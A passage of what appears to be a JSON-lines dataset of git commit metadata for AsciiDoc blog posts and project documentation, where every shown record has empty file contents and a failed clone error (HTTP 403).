2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32c5d0d891cd32767204ac66deebd14217635992","subject":"Update 2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","message":"Update 2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","new_file":"_posts\/2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb61a0228eb788616e9370fdc70184750b9061f6","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e6ffb8a78507661d8e7b2d254dd99d62433bd18a","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6619abe41e1223a52982e35e9c3616673c4e5b9","subject":"y2b create post AlcoHawk Digital Alcohol Detector (Pocket Breathalyzer)","message":"y2b create post AlcoHawk Digital Alcohol Detector (Pocket Breathalyzer)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-19-AlcoHawk-Digital-Alcohol-Detector-Pocket-Breathalyzer.adoc","new_file":"_posts\/2011-12-19-AlcoHawk-Digital-Alcohol-Detector-Pocket-Breathalyzer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b17bcb89e471960b1e082be2b4fa745f3b30cb70","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf3581f6739421115b0b435821c91ba9f1846dd5","subject":"Update 2015-05-04-Hello.adoc","message":"Update 2015-05-04-Hello.adoc","repos":"sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io,sebbrousse\/sebbrousse.github.io","old_file":"_posts\/2015-05-04-Hello.adoc","new_file":"_posts\/2015-05-04-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebbrousse\/sebbrousse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b59fe25a58bb7ae4b2ef38fe082a366a1843025","subject":"Update 2015-09-21-test3.adoc","message":"Update 2015-09-21-test3.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-21-test3.adoc","new_file":"_posts\/2015-09-21-test3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f0dd90b269ecd6da26087ef66aeab9797ec490e","subject":"Update 2019-01-23-C-P-P.adoc","message":"Update 
2019-01-23-C-P-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-23-C-P-P.adoc","new_file":"_posts\/2019-01-23-C-P-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"574c41091143d40f8e72daa9744fd7101be029b8","subject":"Update 2016-02-13-Second-post.adoc","message":"Update 2016-02-13-Second-post.adoc","repos":"mikqi\/blog,mikqi\/blog,mikqi\/blog,mikqi\/blog","old_file":"_posts\/2016-02-13-Second-post.adoc","new_file":"_posts\/2016-02-13-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikqi\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab576dbb7b8374a373637e3b571b8887b2164766","subject":"Update 2015-11-24-Laravel-5-snippet-Has-many-through-many.adoc","message":"Update 2015-11-24-Laravel-5-snippet-Has-many-through-many.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-11-24-Laravel-5-snippet-Has-many-through-many.adoc","new_file":"_posts\/2015-11-24-Laravel-5-snippet-Has-many-through-many.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3029980d822c34583113e89883d4a87a5c04a9c","subject":"Update 2016-07-15-Git-command.adoc","message":"Update 2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dd0c76e9cbe388849d4f13053e9d1326e37e79e","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b837c0590bc73b9107e57bc0c59478006f6be31d","subject":"Update 2016-10-26-S-R-E-1822-.adoc","message":"Update 2016-10-26-S-R-E-1822-.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-10-26-S-R-E-1822-.adoc","new_file":"_posts\/2016-10-26-S-R-E-1822-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d5702cb9b6c131fb11c9b4cceb3c1eb1ce92805","subject":"Update 2017-01-26-Hello-World.adoc","message":"Update 2017-01-26-Hello-World.adoc","repos":"joaquinlpereyra\/joaquinlpereyra.github.io","old_file":"_posts\/2017-01-26-Hello-World.adoc","new_file":"_posts\/2017-01-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joaquinlpereyra\/joaquinlpereyra.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8591d1db70dc3a1c2b3f8381e3dc1cf680a8391a","subject":"Update 2015-09-17-first-commit.adoc","message":"Update 2015-09-17-first-commit.adoc","repos":"popurax\/popurax.github.io,popurax\/popurax.github.io,popurax\/popurax.github.io","old_file":"_posts\/2015-09-17-first-commit.adoc","new_file":"_posts\/2015-09-17-first-commit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/popurax\/popurax.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da21c7ad287a73dfb81540421ebad8fdd1a4d511","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc9e2adb501e91ecc69af00d331c45c88f4bb4f0","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74083ab0da01aa317d8fa3d26189ad590a3c1632","subject":"CAMEL-13149 - Added docs","message":"CAMEL-13149 - Added 
docs\n","repos":"alvinkwekel\/camel,pmoerenhout\/camel,cunningt\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,DariusX\/camel,gnodet\/camel,objectiser\/camel,pax95\/camel,nikhilvibhav\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,punkhorn\/camel-upstream,tdiesler\/camel,Fabryprog\/camel,pax95\/camel,nicolaferraro\/camel,mcollovati\/camel,zregvart\/camel,cunningt\/camel,pmoerenhout\/camel,ullgren\/camel,gnodet\/camel,davidkarlsen\/camel,nicolaferraro\/camel,objectiser\/camel,adessaigne\/camel,pmoerenhout\/camel,zregvart\/camel,zregvart\/camel,gnodet\/camel,tdiesler\/camel,apache\/camel,apache\/camel,CodeSmell\/camel,nikhilvibhav\/camel,pax95\/camel,apache\/camel,adessaigne\/camel,davidkarlsen\/camel,alvinkwekel\/camel,adessaigne\/camel,CodeSmell\/camel,christophd\/camel,alvinkwekel\/camel,pmoerenhout\/camel,pmoerenhout\/camel,Fabryprog\/camel,apache\/camel,nicolaferraro\/camel,nicolaferraro\/camel,mcollovati\/camel,apache\/camel,DariusX\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,alvinkwekel\/camel,ullgren\/camel,objectiser\/camel,christophd\/camel,gnodet\/camel,CodeSmell\/camel,nikhilvibhav\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,objectiser\/camel,Fabryprog\/camel,mcollovati\/camel,adessaigne\/camel,ullgren\/camel,tadayosi\/camel,tdiesler\/camel,Fabryprog\/camel,DariusX\/camel,pmoerenhout\/camel,davidkarlsen\/camel,davidkarlsen\/camel,christophd\/camel,zregvart\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,CodeSmell\/camel,cunningt\/camel,mcollovati\/camel,tadayosi\/camel,pax95\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,tadayosi\/camel,DariusX\/camel,tadayosi\/camel","old_file":"components\/camel-activemq\/src\/main\/docs\/activemq-component.adoc","new_file":"components\/camel-activemq\/src\/main\/docs\/activemq-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a61e704d9c6ced8fc87c63cfcfe526fc5c561802","subject":"Guide for making a CAN message filter","message":"Guide for making a CAN message filter\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"CAN-Filter-Guide\/README.adoc","new_file":"CAN-Filter-Guide\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bef2d3f683543abfb1e058c198b36a48a46258be","subject":"Add docs for Dokku deployment","message":"Add docs for Dokku deployment\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Deployment-with-dokku.adoc","new_file":"docs\/Deployment-with-dokku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"933dda548d061a0c518cb994c50de9fd021f0899","subject":"Update 2015-09-06-Show-terms-for-current-custom-post-in-WordPress.adoc","message":"Update 
2015-09-06-Show-terms-for-current-custom-post-in-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-09-06-Show-terms-for-current-custom-post-in-WordPress.adoc","new_file":"_posts\/2015-09-06-Show-terms-for-current-custom-post-in-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d2262e15bff72956ef2e79a50d170754692435f","subject":"Update 2016-09-18-Computer-Science-Week-3-The-Worst-Possible-Time.adoc","message":"Update 2016-09-18-Computer-Science-Week-3-The-Worst-Possible-Time.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-18-Computer-Science-Week-3-The-Worst-Possible-Time.adoc","new_file":"_posts\/2016-09-18-Computer-Science-Week-3-The-Worst-Possible-Time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9082c604c1d39e2a318e1be629786f449e8ac67e","subject":"Fix command-line arguments in REST API spec","message":"Fix command-line arguments in REST API spec\n\nThe command-line arguments for Elasticsearch must now be specified using\n-E. This commit fixes the usage of command-line arguments in the REST\nAPI spec README.\n","repos":"fernandozhu\/elasticsearch,wangtuo\/elasticsearch,rajanm\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,JervyShi\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,Helen-Zhao\/elasticsearch,MisterAndersen\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,liweinan0423\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,geidies\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,spiegela\/elasticsearch,vroyer\/elassandra,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,dongjoon-hyun\/elasticsearch,nezirus\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,gmarz\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,ricardocerq\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,IanvsPoplicola\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticse
arch,obourgain\/elasticsearch,fred84\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,gmarz\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,ZTE-PaaS\/elasticsearch,shreejay\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,liweinan0423\/elasticsearch,jimczi\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,njlawton\/elasticsearch,vroyer\/elasticassandra,ricardocerq\/elasticsearch,Shepard1212\/elasticsearch,gfyoung\/elasticsearch,fforbeck\/elasticsearch,qwerty4030\/elasticsearch,ricardocerq\/elasticsearch,C-Bish\/elasticsearch,geidies\/elasticsearch,rlugojr\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,sneivandt\/elasticsearch,ricardocerq\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,mikemccand\/elasticsearch,yanjunh\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,MaineC\/elasticsearch,gmarz\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,njlawton\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,StefanGor\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,jimczi\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,dongjoon-hyun\/elasticsearch,umeshdangat\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsearch,uschindler\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,liweinan0423\/elasticsearch,wenpos\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,henakamaMSFT\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,yanjunh\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,masaruh\/elasticsearch,qwerty4030\/elasticsearch,yanjunh\/elasticsearch,s1monw\/elasticsearch,MaineC\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,bawse\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,jimczi\/elasticsearch,spiegela\/elasticsearch,elasticdog\/elasticsearch,dong
joon-hyun\/elasticsearch,coding0011\/elasticsearch,mortonsykes\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,a2lin\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,ricardocerq\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,JervyShi\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,JervyShi\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,sneivandt\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,sneivandt\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,dongjoon-hyun\/elasticsearch,Stacey-Gammon\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,a2lin\/elasticsearch,Helen-Zhao\/elasticsearch,nazarewk\/elasticsearch,C-Bish\/elasticsearch,shreejay\/elasticsearch,yanjunh\/elasticsearch,nazarewk\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,yanjunh\/elasticsearch,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,spiegela\/elasticsearch,wangtuo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,liweinan0423\/elasticsearch,bawse\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nilabhsagar\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elas
ticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,MaineC\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,LeoYao\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,artnowo\/elasticsearch","old_file":"rest-api-spec\/src\/main\/resources\/rest-api-spec\/test\/README.asciidoc","new_file":"rest-api-spec\/src\/main\/resources\/rest-api-spec\/test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"458f6f2a4b7bf4c3e44db93c7894b08539df2b67","subject":"Update 2015-05-25-Articulo-hecho-en-clase.adoc","message":"Update 2015-05-25-Articulo-hecho-en-clase.adoc","repos":"CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io,CarlosRPO\/carlosrpo.github.io","old_file":"_posts\/2015-05-25-Articulo-hecho-en-clase.adoc","new_file":"_posts\/2015-05-25-Articulo-hecho-en-clase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CarlosRPO\/carlosrpo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"396cc9761963b9c65a2848ce2659168a5c73cf35","subject":"Update 2016-04-03-Letat-limite-borderline.adoc","message":"Update 